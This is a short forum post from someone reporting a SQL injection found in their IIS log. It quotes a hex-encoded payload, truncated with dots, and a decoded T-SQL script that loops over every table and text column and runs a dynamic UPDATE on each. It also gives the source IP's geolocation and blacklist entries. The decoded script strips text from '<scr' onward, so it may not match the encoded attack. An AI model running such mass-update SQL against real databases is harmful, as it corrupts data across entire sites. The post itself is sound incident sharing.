We had the same problem 25 September. I found sql-injection in IIS log:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529220.............%20AS%20VARCHAR(4000));EXEC(@S)

I converted this text from HEX-format. LOOK:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=LEFT(CONVERT(VARCHAR(4000),['+@C+']),PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))-1) WHERE PATINDEX(''%<scr%'',CONVERT(VARCHAR(4000),['+@C+']))>0') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The attack was from 41.196.146.57

Information about this IP:

Hostname: host-41-196-146-57.static.link.com.eg

ISP: Link Egypt

Organization: Link Egypt

Proxy: None detected

Type: Unknown

Geo-Location Information

Country: Egypt

State/Region: 11

City: Cairo

Latitude: 30.05

Longitude: 31.25

This IP listed in many blacklists (for ex. dnsbl-3.uceprotect.net, cbl.abuseat.org )